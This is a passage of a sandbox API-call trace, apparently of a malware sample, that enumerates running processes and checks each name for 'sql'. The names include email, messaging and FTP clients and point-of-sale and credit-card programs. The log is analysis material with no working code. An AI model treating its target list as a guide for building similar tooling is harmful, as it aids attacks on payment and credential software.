lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.273] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544ba0 [0091.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3544ba0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0091.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0091.273] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0091.274] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0091.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.275] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544bb8 [0091.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3544bb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0091.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0091.275] StrStrIA (lpFirst="outlook.exe", lpSrch="sql") returned 0x0 [0091.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0091.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.276] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544c78 [0091.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3544c78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0091.276] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0091.276] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0091.276] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0091.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.277] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x353dd90 [0091.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x353dd90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0091.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0091.277] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0091.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0091.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.279] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541c10 [0091.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3541c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0091.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0091.279] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0091.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0091.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.280] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541ca0 [0091.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0091.280] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0091.280] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0091.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.281] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3541b98 [0091.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3541b98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0091.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0091.281] StrStrIA (lpFirst="thunderbird.exe", lpSrch="sql") returned 0x0 [0091.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0091.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.283] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541d30 [0091.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3541d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0091.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0091.283] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0091.283] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0091.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.284] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541b80 [0091.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3541b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0091.284] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0091.284] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0091.284] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0091.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.285] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541bb0 [0091.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3541bb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0091.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0091.286] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0091.286] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0091.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.287] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541c88 [0091.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3541c88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0091.287] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0091.287] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0091.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.288] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541cb8 [0091.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3541cb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0091.288] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0091.288] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0091.288] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0091.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.290] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355ba58 [0091.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x355ba58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0091.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0091.290] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0091.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0091.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.291] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355b9f8 [0091.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x355b9f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0091.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0091.291] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0091.291] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0091.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.292] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541d00 [0091.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3541d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0091.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0091.292] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0091.292] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0091.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.294] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541c40 [0091.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3541c40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0091.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0091.294] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0091.294] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0091.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.295] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541c58 [0091.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3541c58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0091.295] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0091.295] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0091.295] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0091.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0091.297] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3541d18 [0091.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3541d18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0091.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0091.297] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0091.297] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0091.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0091.298] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x355b7b8 [0091.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x355b7b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0091.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0091.298] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0091.298] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0091.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.299] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355b8b8 [0091.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x355b8b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0091.300] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0091.322] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0091.323] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0091.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.324] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541bf8 [0091.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3541bf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0091.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0091.324] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0091.324] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0091.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.325] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541be0 [0091.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3541be0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0091.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0091.325] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0091.325] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0091.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.327] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541ce8 [0091.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3541ce8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0091.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0091.327] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0091.327] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0091.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.328] 